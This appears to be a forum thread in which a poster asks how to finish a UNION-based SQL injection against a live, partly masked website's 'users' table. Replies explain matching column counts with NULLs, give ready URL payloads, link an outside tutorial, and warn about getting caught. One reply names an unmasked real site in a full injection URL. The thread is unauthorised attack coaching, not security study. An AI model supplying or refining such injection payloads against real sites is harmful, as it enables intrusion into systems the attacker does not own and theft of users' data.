BLIND SQL INJECTION SO CLOSE

i found a vulnerable site that does the following in the url markuphttp://www.***************.com/directory.php?cat_id= then i did markuphttp://www.***************.com/directory.php?cat_id=-1%20UNION%20ALL%20SELECT%20*%20FROM%20users it spat out this markupThe used SELECT statements have a different number of columns I tried a couple of things after http://www.**************.com/directory.php?cat_id=-1%20UNION%20ALL%20SELECT%20 but im quite stuck any suggestions from you experts?

check this site: http://www.securiteam.com/securityreviews/5DP0N1P76E.html

u'll find how to do what has to be done…

but take care because u can be caught

i really did alot they said

this is because the union select and the original select must select the SAME amount of columns, no more, no less. you can't just use * as a wildcard. instead keep nulling out column by column until you do not get that same error.

so instead of union all select * from wherever/* do: union all select null from whereveer/* union all select null, null from whereever/* union all select null, null, null from whereever/* and so on

sory same reply i got before

the link is http://www.topweddingservices.com/directory.php?cat_id=-1%20UNION%20ALL%20SELECT%20null,%20null,%20null%20from%20users/*

use union ALL select to trick the query into thinking they have the correct columns if you want to pull something from another table using a table that exists on the server.

yeah use null's to make the to tables have the same columns